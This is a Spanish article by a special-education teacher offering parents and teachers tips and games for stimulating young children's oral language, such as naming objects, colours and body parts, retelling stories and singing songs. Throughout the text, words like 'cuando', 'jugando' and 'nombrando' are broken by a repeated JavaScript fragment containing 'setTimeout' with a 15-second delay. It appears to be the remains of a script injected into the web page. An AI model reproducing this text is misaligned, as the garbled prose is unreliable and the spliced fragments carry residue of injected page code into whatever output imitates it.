LA ESTIMULACIÓN DEL LENGUAJE ORAL DESDE EL AULA DE PEDAGOGÍA TERAPÉUTICA

Autora: Mª Ángeles Cortés Bernabé

          En realidad todos somos un poco logopedas (padres y maestros) con los niños y niñas, ya que con nuesto modelo los enseñamos a hablar. Por eso, y para que la labor con estos sea más eficaz, os recomiendo estas pequeñas estrategias que se tienen en cuenta en el aula de pedagogía terapéutica (asesorada por el maestro del aula de audición y lenguaje), para favorecer la estimulacion del lenguaje oral. Además, si los padres las tienen en cuenta, complementarán el trabajo que se realiza en el colegio con sus hijos, en el caso de que precisen ayuda logopédica o asistan a algún programa de estimulación del lenguaje oral.


 Debemos tener en cuenta:

* Utilizar siempre un lenguaje claro y adulto, evitandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando diminutivos y el lenguaje infantilizado.

* Respetar el ritmo del niño cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando habla y no interrumpirle. No anticipar su respuesta aunque tarde.

* No reír las incorrecciones si el niño comete errores en su lenguaje. Se puede utilizar el método de corrección indirecta de las palabras del niño: repitiendo sus frases, corrigiendo las palabras mal dichas y añadiendo las que no dice, pero siempre después de que él haya acabado de hablar.

* Acostumbrar al niño a que escuche y él también debe ser escuchado.

Además algunas ACTIVIDADES Y JUEGOS que se pueden realizar con los niños son:


1º. Cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando el niño está jugandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando con algún muñeco, podemos nombrarle cada parte del cuerpo del muñeco, señalarla y tocarla. Después haremos que sea él mismo quien lo haga, realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando preguntas como: ¿Qué es esto?¿Dónde tiene la nariz tu muñeco?¿Y las orejas?… Aprovecharemos los momentos del baño para hacerle las mismas preguntas sobre si mismo.

2º.Enseñarle al niño objetos con diferentes colores y pedirle por ejemplo que nos de “la figurita roja”, “el muñeco azul”, etc…. Después solo se le pide el color.

3º. Aprovechar cualquier actividad del día a día para mantener una conversación con el niño: un día en el campo, el cuidado de las plantas, hacer un bizcocho, etc…. Nombraremos los diferentes objetos que se utilizan.

4º. Podemos utilizar el bolso de mano, la mochila, la bolsa de la compra, la bolsa de aseo, la caja de herramientas… para ver qué hay dentro. Hay que hacer que el niño busque dentro del bolso y vaya nombrandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando todo lo que hay. Se pueden sacar todos los objetos y que el niño los vaya introduciendo dentro nombrándolos.

5º. Aprovechar experiencias vividas por el niño como punto de partida para hablar con él. Ejemplos: una excursión, una visita a casa de los abuelos, un cumpleaños, el día de Halloween, etc.

6º. Identificar sonidos previamente grabados (animales, una puerta que se cierra, lluvia, gente, instrumentos musicales, roncar, voz, toser, risas, llantos, etc.)

7º. Jugar a decir cosas que empiecen por: “a”, como “azul”, “abuela”…;”e”, como “elefante”, “Elena”…;“i”, como “iglú”, “iglesia”…;“o”, como “oso”, “olvido”…;“u”, como “uva”, “uña”…

8º También podemos jugar a decir nombres de: juguetes, otros niños, animales, frutas………..

9º A completar frases del tipo: “Una esponja es suave, una piedra es…”; “El abuelo es viejo, el niño es …”;  “Los caballos relinchan, los gatos …”.

10º. Debemos darle mucha importancia a los cuentos, ya que fomentan la imaginación del niño, descubren cosas maravillosas, les divierten, con ellos aprenden a escuchar, pensar y hablar. Por todo ello, se pueden realizar las siguientes actividades:

- Leer cuentos que tengan vistosos dibujos. Después le pediremos que identifique los personajes y que explique que hacen en los dibujos.

- También podemos leerle un cuento y que el niño se invente un titulo.

- O bien que invente el final de un cuento.

- Podemos contarle un cuento y después que el niño lo intente contar a su manera, dejandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando que invente cosas.

11º. Cantaremos canciones acompañadas de movimientos alusivos, para que sea más motivante para el niño. Ejemplo: “Debajo un  botón, tón, tón…”; “Había una vez un barquito pequeñito…”; “Estaba el señor Don gato sentadito en su tejado…”; “A, A, A la casita rota está…”; “Un elefante se balanceaba en la tela de una araña…”; “El uno es un soldado que hace la instrucción…”.

12º Dibujaremos objetos conocidos para el niño (un sol, una nube, un árbol, una mesa…) y él  deberá nombrarlos.

13º Podemos hacer que el niño nos traiga objetos de casa o la clase y que los nombre. Para obligarle a decirlo haremos como que se nos ha olvidado su nombre y necesitamos que él nos lo recuerde.

            En definitiva, si tenemos en cuenta estos juegos y actividades, siempre de forma lúdica, conseguiremos estimular de forma positiva el lenguaje oral de los niños y niñas con o sin ningún déficit en el área lingüística.

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.